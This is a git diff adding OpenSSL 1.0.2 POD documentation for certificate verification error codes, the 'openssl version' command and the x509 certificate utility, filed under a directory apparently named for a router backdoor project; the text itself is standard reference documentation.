+the subject name of the certificate. The second line contains the error number
+and the depth. The depth is number of the certificate being verified when a
+problem was detected starting with zero for the certificate being verified itself
+then 1 for the CA that signed the certificate and so on. Finally a text version
+of the error number is presented.
+
+An exhaustive list of the error codes and messages is shown below, this also
+includes the name of the error code as defined in the header file x509_vfy.h
+Some of the error codes are defined but never returned: these are described
+as "unused".
+
+=over 4
+
+=item B<0 X509_V_OK: ok>
+
+the operation was successful.
+
+=item B<2 X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT: unable to get issuer certificate>
+
+the issuer certificate of a looked up certificate could not be found. This
+normally means the list of trusted certificates is not complete.
+
+=item B<3 X509_V_ERR_UNABLE_TO_GET_CRL: unable to get certificate CRL>
+
+the CRL of a certificate could not be found.
+
+=item B<4 X509_V_ERR_UNABLE_TO_DECRYPT_CERT_SIGNATURE: unable to decrypt certificate's signature>
+
+the certificate signature could not be decrypted. This means that the actual signature value
+could not be determined rather than it not matching the expected value, this is only
+meaningful for RSA keys.
+
+=item B<5 X509_V_ERR_UNABLE_TO_DECRYPT_CRL_SIGNATURE: unable to decrypt CRL's signature>
+
+the CRL signature could not be decrypted: this means that the actual signature value
+could not be determined rather than it not matching the expected value. Unused.
+
+=item B<6 X509_V_ERR_UNABLE_TO_DECODE_ISSUER_PUBLIC_KEY: unable to decode issuer public key>
+
+the public key in the certificate SubjectPublicKeyInfo could not be read.
+
+=item B<7 X509_V_ERR_CERT_SIGNATURE_FAILURE: certificate signature failure>
+
+the signature of the certificate is invalid.
+
+=item B<8 X509_V_ERR_CRL_SIGNATURE_FAILURE: CRL signature failure>
+
+the signature of the certificate is invalid.
+
+=item B<9 X509_V_ERR_CERT_NOT_YET_VALID: certificate is not yet valid>
+
+the certificate is not yet valid: the notBefore date is after the current time.
+
+=item B<10 X509_V_ERR_CERT_HAS_EXPIRED: certificate has expired>
+
+the certificate has expired: that is the notAfter date is before the current time.
+
+=item B<11 X509_V_ERR_CRL_NOT_YET_VALID: CRL is not yet valid>
+
+the CRL is not yet valid.
+
+=item B<12 X509_V_ERR_CRL_HAS_EXPIRED: CRL has expired>
+
+the CRL has expired.
+
+=item B<13 X509_V_ERR_ERROR_IN_CERT_NOT_BEFORE_FIELD: format error in certificate's notBefore field>
+
+the certificate notBefore field contains an invalid time.
+
+=item B<14 X509_V_ERR_ERROR_IN_CERT_NOT_AFTER_FIELD: format error in certificate's notAfter field>
+
+the certificate notAfter field contains an invalid time.
+
+=item B<15 X509_V_ERR_ERROR_IN_CRL_LAST_UPDATE_FIELD: format error in CRL's lastUpdate field>
+
+the CRL lastUpdate field contains an invalid time.
+
+=item B<16 X509_V_ERR_ERROR_IN_CRL_NEXT_UPDATE_FIELD: format error in CRL's nextUpdate field>
+
+the CRL nextUpdate field contains an invalid time.
+
+=item B<17 X509_V_ERR_OUT_OF_MEM: out of memory>
+
+an error occurred trying to allocate memory. This should never happen.
+
+=item B<18 X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT: self signed certificate>
+
+the passed certificate is self signed and the same certificate cannot be found in the list of
+trusted certificates.
+
+=item B<19 X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN: self signed certificate in certificate chain>
+
+the certificate chain could be built up using the untrusted certificates but the root could not
+be found locally.
+
+=item B<20 X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY: unable to get local issuer certificate>
+
+the issuer certificate could not be found: this occurs if the issuer
+certificate of an untrusted certificate cannot be found.
+
+=item B<21 X509_V_ERR_UNABLE_TO_VERIFY_LEAF_SIGNATURE: unable to verify the first certificate>
+
+no signatures could be verified because the chain contains only one certificate and it is not
+self signed.
+
+=item B<22 X509_V_ERR_CERT_CHAIN_TOO_LONG: certificate chain too long>
+
+the certificate chain length is greater than the supplied maximum depth. Unused.
+
+=item B<23 X509_V_ERR_CERT_REVOKED: certificate revoked>
+
+the certificate has been revoked.
+
+=item B<24 X509_V_ERR_INVALID_CA: invalid CA certificate>
+
+a CA certificate is invalid. Either it is not a CA or its extensions are not consistent
+with the supplied purpose.
+
+=item B<25 X509_V_ERR_PATH_LENGTH_EXCEEDED: path length constraint exceeded>
+
+the basicConstraints pathlength parameter has been exceeded.
+
+=item B<26 X509_V_ERR_INVALID_PURPOSE: unsupported certificate purpose>
+
+the supplied certificate cannot be used for the specified purpose.
+
+=item B<27 X509_V_ERR_CERT_UNTRUSTED: certificate not trusted>
+
+the root CA is not marked as trusted for the specified purpose.
+
+=item B<28 X509_V_ERR_CERT_REJECTED: certificate rejected>
+
+the root CA is marked to reject the specified purpose.
+
+=item B<29 X509_V_ERR_SUBJECT_ISSUER_MISMATCH: subject issuer mismatch>
+
+the current candidate issuer certificate was rejected because its subject name
+did not match the issuer name of the current certificate. Only displayed when
+the B<-issuer_checks> option is set.
+
+=item B<30 X509_V_ERR_AKID_SKID_MISMATCH: authority and subject key identifier mismatch>
+
+the current candidate issuer certificate was rejected because its subject key
+identifier was present and did not match the authority key identifier current
+certificate. Only displayed when the B<-issuer_checks> option is set.
+
+=item B<31 X509_V_ERR_AKID_ISSUER_SERIAL_MISMATCH: authority and issuer serial number mismatch>
+
+the current candidate issuer certificate was rejected because its issuer name
+and serial number was present and did not match the authority key identifier
+of the current certificate. Only displayed when the B<-issuer_checks> option is set.
+
+=item B<32 X509_V_ERR_KEYUSAGE_NO_CERTSIGN:key usage does not include certificate signing>
+
+the current candidate issuer certificate was rejected because its keyUsage extension
+does not permit certificate signing.
+
+=item B<50 X509_V_ERR_APPLICATION_VERIFICATION: application verification failure>
+
+an application specific error. Unused.
+
+=back
+
+=head1 BUGS
+
+Although the issuer checks are a considerable improvement over the old technique they still
+suffer from limitations in the underlying X509_LOOKUP API. One consequence of this is that
+trusted certificates with matching subject name must either appear in a file (as specified by the
+B<-CAfile> option) or a directory (as specified by B<-CApath>. If they occur in both then only
+the certificates in the file will be recognised.
+
+Previous versions of OpenSSL assume certificates with matching subject name are identical and
+mishandled them.
+
+Previous versions of this documentation swapped the meaning of the
+B<X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT> and
+B<20 X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY> error codes.
+
+=head1 SEE ALSO
+
+L<x509(1)|x509(1)>
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/version.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/version.pod
new file mode 100644
index 0000000..58f543b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/version.pod
@@ -0,0 +1,65 @@
+=pod
+
+=head1 NAME
+
+version - print OpenSSL version information
+
+=head1 SYNOPSIS
+
+B<openssl version>
+[B<-a>]
+[B<-v>]
+[B<-b>]
+[B<-o>]
+[B<-f>]
+[B<-p>]
+[B<-d>]
+
+=head1 DESCRIPTION
+
+This command is used to print out version information about OpenSSL.
+
+=head1 OPTIONS
+
+=over 4
+
+=item B<-a>
+
+all information, this is the same as setting all the other flags.
+
+=item B<-v>
+
+the current OpenSSL version.
+
+=item B<-b>
+
+the date the current version of OpenSSL was built.
+
+=item B<-o>
+
+option information: various options set when the library was built.
+
+=item B<-f>
+
+compilation flags.
+
+=item B<-p>
+
+platform setting.
+
+=item B<-d>
+
+OPENSSLDIR setting.
+
+=back
+
+=head1 NOTES
+
+The output of B<openssl version -a> would typically be used when sending
+in a bug report.
+
+=head1 HISTORY
+
+The B<-d> option was added in OpenSSL 0.9.7.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/x509.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/x509.pod
new file mode 100644
index 0000000..a1326ed
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/apps/x509.pod
@@ -0,0 +1,889 @@
+
+=pod
+
+=head1 NAME
+
+x509 - Certificate display and signing utility
+
+=head1 SYNOPSIS
+
+B<openssl> B<x509>
+[B<-inform DER|PEM|NET>]
+[B<-outform DER|PEM|NET>]
+[B<-keyform DER|PEM>]
+[B<-CAform DER|PEM>]
+[B<-CAkeyform DER|PEM>]
+[B<-in filename>]
+[B<-out filename>]
+[B<-serial>]
+[B<-hash>]
+[B<-subject_hash>]
+[B<-issuer_hash>]
+[B<-ocspid>]
+[B<-subject>]
+[B<-issuer>]
+[B<-nameopt option>]
+[B<-email>]
+[B<-ocsp_uri>]
+[B<-startdate>]
+[B<-enddate>]
+[B<-purpose>]
+[B<-dates>]
+[B<-checkend num>]
+[B<-modulus>]
+[B<-pubkey>]
+[B<-fingerprint>]
+[B<-alias>]
+[B<-noout>]
+[B<-trustout>]
+[B<-clrtrust>]
+[B<-clrreject>]
+[B<-addtrust arg>]
+[B<-addreject arg>]
+[B<-setalias arg>]
+[B<-days arg>]
+[B<-set_serial n>]
+[B<-signkey filename>]
+[B<-passin arg>]
+[B<-x509toreq>]
+[B<-req>]
+[B<-CA filename>]
+[B<-CAkey filename>]
+[B<-CAcreateserial>]
+[B<-CAserial filename>]
+[B<-force_pubkey key>]
+[B<-text>]
+[B<-certopt option>]
+[B<-C>]
+[B<-md2|-md5|-sha1|-mdc2>]
+[B<-clrext>]
+[B<-extfile filename>]
+[B<-extensions section>]
+[B<-engine id>]
+
+=head1 DESCRIPTION
+
+The B<x509> command is a multi purpose certificate utility. It can be
+used to display certificate information, convert certificates to
+various forms, sign certificate requests like a "mini CA" or edit
+certificate trust settings.
+
+Since there are a large number of options they will split up into
+various sections.
+
+=head1 OPTIONS
+
+=head2 INPUT, OUTPUT AND GENERAL PURPOSE OPTIONS
+
+=over 4
+
+=item B<-inform DER|PEM|NET>
+
+This specifies the input format normally the command will expect an X509
+certificate but this can change if other options such as B<-req> are
+present. The DER format is the DER encoding of the certificate and PEM
+is the base64 encoding of the DER encoding with header and footer lines
+added. The NET option is an obscure Netscape server format that is now
+obsolete.
+
+=item B<-outform DER|PEM|NET>
+
+This specifies the output format, the options have the same meaning as the 
+B<-inform> option.
+
+=item B<-in filename>
+
+This specifies the input filename to read a certificate from or standard input
+if this option is not specified.
+
+=item B<-out filename>
+
+This specifies the output filename to write to or standard output by
+default.
+
+=item B<-md2|-md5|-sha1|-mdc2>
+
+the digest to use. This affects any signing or display option that uses a message
+digest, such as the B<-fingerprint>, B<-signkey> and B<-CA> options. If not
+specified then SHA1 is used. If the key being used to sign with is a DSA key
+then this option has no effect: SHA1 is always used with DSA keys.
+
+=item B<-engine id>
+
+specifying an engine (by its unique B<id> string) will cause B<x509>
+to attempt to obtain a functional reference to the specified engine,
+thus initialising it if needed. The engine will then be set as the default
+for all available algorithms.
+
+=back
+
+=head2 DISPLAY OPTIONS
+
+Note: the B<-alias> and B<-purpose> options are also display options
+but are described in the B<TRUST SETTINGS> section.
+
+=over 4
+
+=item B<-text>
+
+prints out the certificate in text form. Full details are output including the
+public key, signature algorithms, issuer and subject names, serial number
+any extensions present and any trust settings.
+
+=item B<-certopt option>
+
+customise the output format used with B<-text>. The B<option> argument can be
+a single option or multiple options separated by commas. The B<-certopt> switch
+may be also be used more than once to set multiple options. See the B<TEXT OPTIONS>
+section for more information.
+
+=item B<-noout>
+
+this option prevents output of the encoded version of the request.
+
+=item B<-pubkey>
+
+outputs the the certificate's SubjectPublicKeyInfo block in PEM format.
+
+=item B<-modulus>
+
+this option prints out the value of the modulus of the public key
+contained in the certificate.
+
+=item B<-serial>
+
+outputs the certificate serial number.
+
+=item B<-subject_hash>
+
+outputs the "hash" of the certificate subject name. This is used in OpenSSL to
+form an index to allow certificates in a directory to be looked up by subject
+name.
+
+=item B<-issuer_hash>
+
+outputs the "hash" of the certificate issuer name.
+
+=item B<-ocspid>
+
+outputs the OCSP hash values for the subject name and public key.
+
+=item B<-hash>
+
+synonym for "-subject_hash" for backward compatibility reasons.
+
+=item B<-subject_hash_old>
+
+outputs the "hash" of the certificate subject name using the older algorithm
+as used by OpenSSL versions before 1.0.0.
+
+=item B<-issuer_hash_old>
+
+outputs the "hash" of the certificate issuer name using the older algorithm
+as used by OpenSSL versions before 1.0.0.
+
+=item B<-subject>
+
+outputs the subject name.
+
+=item B<-issuer>
+
+outputs the issuer name.
+
+=item B<-nameopt option>
+
+option which determines how the subject or issuer names are displayed. The
+B<option> argument can be a single option or multiple options separated by
+commas.  Alternatively the B<-nameopt> switch may be used more than once to
+set multiple options. See the B<NAME OPTIONS> section for more information.
+
+=item B<-email>
+
+outputs the email address(es) if any.
+
+=item B<-ocsp_uri>
+
+outputs the OCSP responder address(es) if any.
+
+=item B<-startdate>
+
+prints out the start date of the certificate, that is the notBefore date.
+
+=item B<-enddate>
+
+prints out the expiry date of the certificate, that is the notAfter date.
+
+=item B<-dates>
+
+prints out the start and expiry dates of a certificate.
+
+=item B<-checkend arg>
+
+checks if the certificate expires within the next B<arg> seconds and exits
+non-zero if yes it will expire or zero if not.
+
+=item B<-fingerprint>
+
+prints out the digest of the DER encoded version of the whole certificate
+(see digest options).
+
+=item B<-C>
+
+this outputs the certificate in the form of a C source file.
+
+=back
+
+=head2 TRUST SETTINGS
+
+Please note these options are currently experimental and may well change.
+
+A B<trusted certificate> is an ordinary certificate which has several
+additional pieces of information attached to it such as the permitted
+and prohibited uses of the certificate and an "alias".
+
+Normally when a certificate is being verified at least one certificate
+must be "trusted". By default a trusted certificate must be stored
+locally and must be a root CA: any certificate chain ending in this CA
+is then usable for any purpose.
+
+Trust settings currently are only used with a root CA. They allow a finer
+control over the purposes the root CA can be used for. For example a CA
+may be trusted for SSL client but not SSL server use.
+
+See the description of the B<verify> utility for more information on the
+meaning of trust settings.
+
+Future versions of OpenSSL will recognize trust settings on any
+certificate: not just root CAs.
+
+
+=over 4
+
+=item B<-trustout>
+
+this causes B<x509> to output a B<trusted> certificate. An ordinary
+or trusted certificate can be input but by default an ordinary
+certificate is output and any trust settings are discarded. With the
+B<-trustout> option a trusted certificate is output. A trusted
+certificate is automatically output if any trust settings are modified.
+
+=item B<-setalias arg>
+
+sets the alias of the certificate. This will allow the certificate
+to be referred to using a nickname for example "Steve's Certificate".
+
+=item B<-alias>
+
+outputs the certificate alias, if any.
+
+=item B<-clrtrust>
+
+clears all the permitted or trusted uses of the certificate.
+
+=item B<-clrreject>
+
+clears all the prohibited or rejected uses of the certificate.
+
+=item B<-addtrust arg>
+
+adds a trusted certificate use. Any object name can be used here
+but currently only B<clientAuth> (SSL client use), B<serverAuth>
+(SSL server use) and B<emailProtection> (S/MIME email) are used.
+Other OpenSSL applications may define additional uses.
+
+=item B<-addreject arg>
+
+adds a prohibited use. It accepts the same values as the B<-addtrust>
+option.
+
+=item B<-purpose>
+
+this option performs tests on the certificate extensions and outputs
+the results. For a more complete description see the B<CERTIFICATE
+EXTENSIONS> section.
+
+=back
+
+=head2 SIGNING OPTIONS
+
+The B<x509> utility can be used to sign certificates and requests: it
+can thus behave like a "mini CA".
+
+=over 4
+
+=item B<-signkey filename>
+
+this option causes the input file to be self signed using the supplied
+private key. 
+
+If the input file is a certificate it sets the issuer name to the
+subject name (i.e.  makes it self signed) changes the public key to the
+supplied value and changes the start and end dates. The start date is
+set to the current time and the end date is set to a value determined
+by the B<-days> option. Any certificate extensions are retained unless
+the B<-clrext> option is supplied.
+
+If the input is a certificate request then a self signed certificate
+is created using the supplied private key using the subject name in
+the request.
+
+=item B<-passin arg>
+
+the key password source. For more information about the format of B<arg>
+see the B<PASS PHRASE ARGUMENTS> section in L<openssl(1)|openssl(1)>.
+
+=item B<-clrext>
+
+delete any extensions from a certificate. This option is used when a
+certificate is being created from another certificate (for example with
+the B<-signkey> or the B<-CA> options). Normally all extensions are
+retained.
+
+=item B<-keyform PEM|DER>
+
+specifies the format (DER or PEM) of the private key file used in the
+B<-signkey> option.
+
+=item B<-days arg>
+
+specifies the number of days to make a certificate valid for. The default
+is 30 days.
+
+=item B<-x509toreq>
+
+converts a certificate into a certificate request. The B<-signkey> option
+is used to pass the required private key.
+
+=item B<-req>
+
+by default a certificate is expected on input. With this option a
+certificate request is expected instead.
+
+=item B<-set_serial n>
+
+specifies the serial number to use. This option can be used with either
+the B<-signkey> or B<-CA> options. If used in conjunction with the B<-CA>
+option the serial number file (as specified by the B<-CAserial> or
+B<-CAcreateserial> options) is not used.
+
+The serial number can be decimal or hex (if preceded by B<0x>). Negative
+serial numbers can also be specified but their use is not recommended.
+
+=item B<-CA filename>
+
+specifies the CA certificate to be used for signing. When this option is
+present B<x509> behaves like a "mini CA". The input file is signed by this
+CA using this option: that is its issuer name is set to the subject name
+of the CA and it is digitally signed using the CAs private key.
+
+This option is normally combined with the B<-req> option. Without the
+B<-req> option the input is a certificate which must be self signed.
+
+=item B<-CAkey filename>
+
+sets the CA private key to sign a certificate with. If this option is
+not specified then it is assumed that the CA private key is present in
+the CA certificate file.
+
+=item B<-CAserial filename>
+
+sets the CA serial number file to use.
+
+When the B<-CA> option is used to sign a certificate it uses a serial
+number specified in a file. This file consist of one line containing
+an even number of hex digits with the serial number to use. After each
+use the serial number is incremented and written out to the file again.
+
+The default filename consists of the CA certificate file base name with
+".srl" appended. For example if the CA certificate file is called 
+"mycacert.pem" it expects to find a serial number file called "mycacert.srl".
+
+=item B<-CAcreateserial>
+
+with this option the CA serial number file is created if it does not exist:
+it will contain the serial number "02" and the certificate being signed will
+have the 1 as its serial number. Normally if the B<-CA> option is specified
+and the serial number file does not exist it is an error.
+
+=item B<-extfile filename>
+
+file containing certificate extensions to use. If not specified then
+no extensions are added to the certificate.
+
+=item B<-extensions section>
+
+the section to add certificate extensions from. If this option is not
+specified then the extensions should either be contained in the unnamed
+(default) section or the default section should contain a variable called
+"extensions" which contains the section to use. See the
+L<x509v3_config(5)|x509v3_config(5)> manual page for details of the
+extension section format.
+
+=item B<-force_pubkey key>
+
+when a certificate is created set its public key to B<key> instead of the
+key in the certificate or certificate request. This option is useful for
+creating certificates where the algorithm can't normally sign requests, for
+example DH.
+
+The format or B<key> can be specified using the B<-keyform> option.
+
+=back
+
+=head2 NAME OPTIONS
+
+The B<nameopt> command line switch determines how the subject and issuer
+names are displayed. If no B<nameopt> switch is present the default "oneline"
+format is used which is compatible with previous versions of OpenSSL.
+Each option is described in detail below, all options can be preceded by
+a B<-> to turn the option off. Only the first four will normally be used.
+
+=over 4
+
+=item B<compat>
+
+use the old format. This is equivalent to specifying no name options at all.
+
+=item B<RFC2253>
+
+displays names compatible with RFC2253 equivalent to B<esc_2253>, B<esc_ctrl>,
+B<esc_msb>, B<utf8>, B<dump_nostr>, B<dump_unknown>, B<dump_der>,
+B<sep_comma_plus>, B<dn_rev> and B<sname>.
+
+=item B<oneline>
+
+a oneline format which is more readable than RFC2253. It is equivalent to
+specifying the  B<esc_2253>, B<esc_ctrl>, B<esc_msb>, B<utf8>, B<dump_nostr>,
+B<dump_der>, B<use_quote>, B<sep_comma_plus_space>, B<space_eq> and B<sname>
+options.
+
+=item B<multiline>
+
+a multiline format. It is equivalent B<esc_ctrl>, B<esc_msb>, B<sep_multiline>,
+B<space_eq>, B<lname> and B<align>.
+
+=item B<esc_2253>
+
+escape the "special" characters required by RFC2253 in a field That is
+B<,+"E<lt>E<gt>;>. Additionally B<#> is escaped at the beginning of a string
+and a space character at the beginning or end of a string.
+
+=item B<esc_ctrl>
+
+escape control characters. That is those with ASCII values less than
+0x20 (space) and the delete (0x7f) character. They are escaped using the
+RFC2253 \XX notation (where XX are two hex digits representing the
+character value).
+
+=item B<esc_msb>
+
+escape characters with the MSB set, that is with ASCII values larger than
+127.
+
+=item B<use_quote>
+
+escapes some characters by surrounding the whole string with B<"> characters,
+without the option all escaping is done with the B<\> character.
+
+=item B<utf8>
+
+convert all strings to UTF8 format first. This is required by RFC2253. If
+you are lucky enough to have a UTF8 compatible terminal then the use
+of this option (and B<not> setting B<esc_msb>) may result in the correct
+display of multibyte (international) characters. Is this option is not
+present then multibyte characters larger than 0xff will be represented
+using the format \UXXXX for 16 bits and \WXXXXXXXX for 32 bits.
+Also if this option is off any UTF8Strings will be converted to their
+character form first.
+
+=item B<ignore_type>
+
+this option does not attempt to interpret multibyte characters in any
+way. That is their content octets are merely dumped as though one octet
+represents each character. This is useful for diagnostic purposes but
+will result in rather odd looking output.
+
+=item B<show_type>
+
+show the type of the ASN1 character string. The type precedes the
+field contents. For example "BMPSTRING: Hello World".
+
+=item B<dump_der>
+
+when this option is set any fields that need to be hexdumped will
+be dumped using the DER encoding of the field. Otherwise just the
+content octets will be displayed. Both options use the RFC2253
+B<#XXXX...> format.
+
+=item B<dump_nostr>
+
+dump non character string types (for example OCTET STRING) if this
+option is not set then non character string types will be displayed
+as though each content octet represents a single character.
+
+=item B<dump_all>
+
+dump all fields. This option when used with B<dump_der> allows the
+DER encoding of the structure to be unambiguously determined.
+
+=item B<dump_unknown>
+
+dump any field whose OID is not recognised by OpenSSL.
+
+=item B<sep_comma_plus>, B<sep_comma_plus_space>, B<sep_semi_plus_space>,
+B<sep_multiline>
+
+these options determine the field separators. The first character is
+between RDNs and the second between multiple AVAs (multiple AVAs are
+very rare and their use is discouraged). The options ending in
+"space" additionally place a space after the separator to make it
+more readable. The B<sep_multiline> uses a linefeed character for
+the RDN separator and a spaced B<+> for the AVA separator. It also
+indents the fields by four characters.
+
+=item B<dn_rev>
+
+reverse the fields of the DN. This is required by RFC2253. As a side
+effect this also reverses the order of multiple AVAs but this is
+permissible.
+
+=item B<nofname>, B<sname>, B<lname>, B<oid>
+
+these options alter how the field name is displayed. B<nofname> does
+not display the field at all. B<sname> uses the "short name" form
+(CN for commonName for example). B<lname> uses the long form.
+B<oid> represents the OID in numerical form and is useful for
+diagnostic purpose.
+
+=item B<align>
+
+align field values for a more readable output. Only usable with
+B<sep_multiline>.
+
+=item B<space_eq>
+
+places spaces round the B<=> character which follows the field
+name.
+
+=back
+
+=head2 TEXT OPTIONS
+
+As well as customising the name output format, it is also possible to
+customise the actual fields printed using the B<certopt> options when
+the B<text> option is present. The default behaviour is to print all fields.
+
+=over 4
+
+=item B<compatible>
+
+use the old format. This is equivalent to specifying no output options at all.
+
+=item B<no_header>
+
+don't print header information: that is the lines saying "Certificate" and "Data".
+
+=item B<no_version>
+
+don't print out the version number.
+
+=item B<no_serial>
+
+don't print out the serial number.
+
+=item B<no_signame>
+
+don't print out the signature algorithm used.
+
+=item B<no_validity>
+
+don't print the validity, that is the B<notBefore> and B<notAfter> fields.
+
+=item B<no_subject>
+
+don't print out the subject name.
+
+=item B<no_issuer>
+
+don't print out the issuer name.
+
+=item B<no_pubkey>
+
+don't print out the public key.
+
+=item B<no_sigdump>
+
+don't give a hexadecimal dump of the certificate signature.
+
+=item B<no_aux>
+
+don't print out certificate trust information.
+
+=item B<no_extensions>
+
+don't print out any X509V3 extensions.
+
+=item B<ext_default>
+
+retain default extension behaviour: attempt to print out unsupported certificate extensions.
+
+=item B<ext_error>
+
+print an error message for unsupported certificate extensions.
+
+=item B<ext_parse>
+
+ASN1 parse unsupported extensions.
+
+=item B<ext_dump>
+
+hex dump unsupported extensions.
+
+=item B<ca_default>
+
+the value used by the B<ca> utility, equivalent to B<no_issuer>, B<no_pubkey>, B<no_header>,
+B<no_version>, B<no_sigdump> and B<no_signame>.
+
+=back
+
+=head1 EXAMPLES
+
+Note: in these examples the '\' means the example should be all on one
+line.
+
+Display the contents of a certificate:
+
+ openssl x509 -in cert.pem -noout -text
+
+Display the certificate serial number:
+
+ openssl x509 -in cert.pem -noout -serial
+
+Display the certificate subject name:
+
+ openssl x509 -in cert.pem -noout -subject
+
+Display the certificate subject name in RFC2253 form:
+
+ openssl x509 -in cert.pem -noout -subject -nameopt RFC2253
+
+Display the certificate subject name in oneline form on a terminal
+supporting UTF8:
+
+ openssl x509 -in cert.pem -noout -subject -nameopt oneline,-esc_msb
+
+Display the certificate MD5 fingerprint:
+
+ openssl x509 -in cert.pem -noout -fingerprint
+
+Display the certificate SHA1 fingerprint:
+
+ openssl x509 -sha1 -in cert.pem -noout -fingerprint
+
+Convert a certificate from PEM to DER format:
+
+ openssl x509 -in cert.pem -inform PEM -out cert.der -outform DER
+
+Convert a certificate to a certificate request:
+
+ openssl x509 -x509toreq -in cert.pem -out req.pem -signkey key.pem
+
+Convert a certificate request into a self signed certificate using
+extensions for a CA:
+
+ openssl x509 -req -in careq.pem -extfile openssl.cnf -extensions v3_ca \
+	-signkey key.pem -out cacert.pem
+
+Sign a certificate request using the CA certificate above and add user
+certificate extensions:
+
+ openssl x509 -req -in req.pem -extfile openssl.cnf -extensions v3_usr \
+	-CA cacert.pem -CAkey key.pem -CAcreateserial
+
+
+Set a certificate to be trusted for SSL client use and change set its alias to
+"Steve's Class 1 CA"
+
+ openssl x509 -in cert.pem -addtrust clientAuth \
+	-setalias "Steve's Class 1 CA" -out trust.pem
+
+=head1 NOTES
+
+The PEM format uses the header and footer lines:
+
+ -----BEGIN CERTIFICATE-----
+ -----END CERTIFICATE-----
+
+it will also handle files containing:
+
+ -----BEGIN X509 CERTIFICATE-----
+ -----END X509 CERTIFICATE-----
+
+Trusted certificates have the lines
+
+ -----BEGIN TRUSTED CERTIFICATE-----
+ -----END TRUSTED CERTIFICATE-----
+
+The conversion to UTF8 format used with the name options assumes that
+T61Strings use the ISO8859-1 character set. This is wrong but Netscape
+and MSIE do this as do many certificates. So although this is incorrect
+it is more likely to display the majority of certificates correctly.
+
+The B<-fingerprint> option takes the digest of the DER encoded certificate.
+This is commonly called a "fingerprint". Because of the nature of message
+digests the fingerprint of a certificate is unique to that certificate and
+two certificates with the same fingerprint can be considered to be the same.
+
+The Netscape fingerprint uses MD5 whereas MSIE uses SHA1.
+
+The B<-email> option searches the subject name and the subject alternative
+name extension. Only unique email addresses will be printed out: it will
+not print the same address more than once.
+
+=head1 CERTIFICATE EXTENSIONS
+
+The B<-purpose> option checks the certificate extensions and determines
+what the certificate can be used for. The actual checks done are rather
+complex and include various hacks and workarounds to handle broken
+certificates and software.
+
+The same code is used when verifying untrusted certificates in chains
+so this section is useful if a chain is rejected by the verify code.
+
+The basicConstraints extension CA flag is used to determine whether the
+certificate can be used as a CA. If the CA flag is true then it is a CA,
+if the CA flag is false then it is not a CA. B<All> CAs should have the
+CA flag set to true.
+
+If the basicConstraints extension is absent then the certificate is
+considered to be a "possible CA" other extensions are checked according
+to the intended use of the certificate. A warning is given in this case
+because the certificate should really not be regarded as a CA: however
+it is allowed to be a CA to work around some broken software.
+
+If the certificate is a V1 certificate (and thus has no extensions) and
+it is self signed it is also assumed to be a CA but a warning is again
+given: this is to work around the problem of Verisign roots which are V1
+self signed certificates.
+
+If the keyUsage extension is present then additional restraints are
+made on the uses of the certificate. A CA certificate B<must> have the
+keyCertSign bit set if the keyUsage extension is present.
+
+The extended key usage extension places additional restrictions on the
+certificate uses. If this extension is present (whether critical or not)
+the key can only be used for the purposes specified.
+
+A complete description of each test is given below. The comments about
+basicConstraints and keyUsage and V1 certificates above apply to B<all>
+CA certificates.
+
+
+=over 4
+
+=item B<SSL Client>
+
+The extended key usage extension must be absent or include the "web client
+authentication" OID.  keyUsage must be absent or it must have the
+digitalSignature bit set. Netscape certificate type must be absent or it must
+have the SSL client bit set.
+
+=item B<SSL Client CA>
+
+The extended key usage extension must be absent or include the "web client
+authentication" OID. Netscape certificate type must be absent or it must have
+the SSL CA bit set: this is used as a work around if the basicConstraints
+extension is absent.
+
+=item B<SSL Server>
+
+The extended key usage extension must be absent or include the "web server
+authentication" and/or one of the SGC OIDs.  keyUsage must be absent or it
+must have the digitalSignature, the keyEncipherment set or both bits set.
+Netscape certificate type must be absent or have the SSL server bit set.
+
+=item B<SSL Server CA>
+
+The extended key usage extension must be absent or include the "web server
+authentication" and/or one of the SGC OIDs.  Netscape certificate type must
+be absent or the SSL CA bit must be set: this is used as a work around if the
+basicConstraints extension is absent.
+
+=item B<Netscape SSL Server>
+
+For Netscape SSL clients to connect to an SSL server it must have the
+keyEncipherment bit set if the keyUsage extension is present. This isn't
+always valid because some cipher suites use the key for digital signing.
+Otherwise it is the same as a normal SSL server.
+
+=item B<Common S/MIME Client Tests>
+
+The extended key usage extension must be absent or include the "email
+protection" OID. Netscape certificate type must be absent or should have the
+S/MIME bit set. If the S/MIME bit is not set in netscape certificate type
+then the SSL client bit is tolerated as an alternative but a warning is shown:
+this is because some Verisign certificates don't set the S/MIME bit.
+
+=item B<S/MIME Signing>
+
+In addition to the common S/MIME client tests the digitalSignature bit must
+be set if the keyUsage extension is present.
+
+=item B<S/MIME Encryption>
+
+In addition to the common S/MIME tests the keyEncipherment bit must be set
+if the keyUsage extension is present.
+
+=item B<S/MIME CA>
+
+The extended key usage extension must be absent or include the "email
+protection" OID. Netscape certificate type must be absent or must have the
+S/MIME CA bit set: this is used as a work around if the basicConstraints
+extension is absent. 
+
+=item B<CRL Signing>
+
+The keyUsage extension must be absent or it must have the CRL signing bit
+set.
+
+=item B<CRL Signing CA>
+
+The normal CA tests apply. Except in this case the basicConstraints extension
+must be present.
+
+=back
+
+=head1 BUGS
+
+Extensions in certificates are not transferred to certificate requests and
+vice versa.
+
+It is possible to produce invalid certificates or requests by specifying the
+wrong private key or using inconsistent options in some cases: these should
+be checked.
+
+There should be options to explicitly set such things as start and end
+dates rather than an offset from the current time.
+
+The code to implement the verify behaviour described in the B<TRUST SETTINGS>
+is currently being developed. It thus describes the intended behaviour rather
+than the current behaviour. It is hoped that it will represent reality in
+OpenSSL 0.9.5 and later.
+
+=head1 SEE ALSO
+
+L<req(1)|req(1)>, L<ca(1)|ca(1)>, L<genrsa(1)|genrsa(1)>,
+L<gendsa(1)|gendsa(1)>, L<verify(1)|verify(1)>,
